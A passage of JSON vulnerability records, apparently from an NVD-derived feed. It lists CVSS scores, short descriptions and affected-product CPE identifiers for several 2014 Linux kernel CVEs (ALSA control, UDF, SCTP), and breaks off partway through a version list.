"cpe23": ["cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:vmware:*:*", "cpe:2.3:a:f5:big-iq_cloud:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:11.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:a:f5:big-iq_application_delivery_controller:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:enterprise_manager:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_high_availability_extension:11:sp3:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_real_time_extension:11:sp3:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_security:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_device:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:-:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:12.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:25", "description": "Race condition in the tlv handler functionality in the snd_ctl_elem_user_tlv function in sound/core/control.c in the ALSA control implementation in the Linux kernel before 3.15.2 allows local users to obtain sensitive information from kernel memory by leveraging /dev/snd/controlCX access.", "edition": 8, "cvss3": {}, "published": "2014-07-03T04:22:00", "title": "CVE-2014-4652", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4652"], "modified": "2020-08-14T17:53:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2014-4652", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4652", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*"]}, {"lastseen": "2020-12-09T19:58:25", "description": "Multiple integer overflows in sound/core/control.c in the ALSA control implementation in the Linux kernel before 3.15.2 allow local users to cause a denial of service by leveraging /dev/snd/controlCX access, related to (1) index values in the snd_ctl_add function and (2) numid values in the snd_ctl_remove_numid_conflict function.", "edition": 8, "cvss3": {}, "published": "2014-07-03T04:22:00", "title": "CVE-2014-4656", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4656"], "modified": "2020-08-14T18:02:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_tus:6.6", "cpe:/o:redhat:enterprise_linux_server_aus:6.6"], "id": "CVE-2014-4656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4656", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:26", "description": "The __udf_read_inode function in fs/udf/inode.c in the Linux kernel through 3.16.3 does not restrict the amount of ICB indirection, which allows physically proximate attackers to cause a denial of service (infinite loop or stack consumption) via a UDF filesystem with a crafted inode.", "edition": 5, "cvss3": {}, "published": "2014-09-28T10:55:00", "title": "CVE-2014-6410", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6410"], "modified": "2016-08-23T02:08:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.3", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2", "cpe:/o:linux:linux_kernel:3.16.1"], "id": "CVE-2014-6410", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6410", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:24", "description": "The SCTP implementation in the Linux kernel before 3.17.4 allows remote attackers to cause a denial of service (memory consumption) by triggering a large number of chunks in an association's output queue, as demonstrated by ASCONF probes, related to net/sctp/inqueue.c and net/sctp/sm_statefuns.c.", "edition": 5, "cvss3": {}, "published": "2014-11-30T01:59:00", "title": "CVE-2014-3688", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3688"], "modified": "2016-08-23T02:08:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.12.8", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.14.4", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.10", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.10.21", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.15.8", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.12.14", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.12.10", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.15.5", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.12.15", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.12.17", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.10.19", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.13.7", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.12.11", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.10.20", "cpe:/o:linux:linux_kernel:3.15.3", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.10.26", "cpe:/o:linux:linux_kernel:3.13.10", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.10.0", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.15.2", "cpe:/o:linux:linux_kernel:3.13.4", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.12.13", "cpe:/o:linux:linux_kernel:3.10.27", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.10.24", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.14.3", "cpe:/o:linux:linux_kernel:3.12.5", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:3.13.2", "cpe:/o:linux:linux_kernel:3.11.8", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.10.28", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.13.6", "cpe:/o:linux:linux_kernel:3.11.9", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.10.25", "cpe:/o:linux:linux_kernel:3.13.5", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.15.1", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.13.9", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.17.3", "cpe:/o:linux:linux_kernel:3.14.2", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.13.3", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.13", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.13.11", "cpe:/o:linux:linux_kernel:3.17.2", "cpe:/o:linux:linux_kernel:3.14.1", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.12.6", "cpe:/o:linux:linux_kernel:3.12.7", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.10.23", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.15", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.15.7", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.12.12", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.13.1", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.15.4", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.10.29", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.12.16", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.12.4", "cpe:/o:linux:linux_kernel:3.17.1", "cpe:/o:linux:linux_kernel:3.14.5", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.13.8", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.10.22", "cpe:/o:linux:linux_kernel:3.17", "cpe:/o:linux:linux_kernel:3.15.6", "cpe:/o:linux:linux_kernel:3.11.10", "cpe:/o:linux:linux_kernel:3.12.9"], "id": "CVE-2014-3688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3688", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.14:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.0:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.10.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:-:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.10:*:*:*:*:*:*:*", 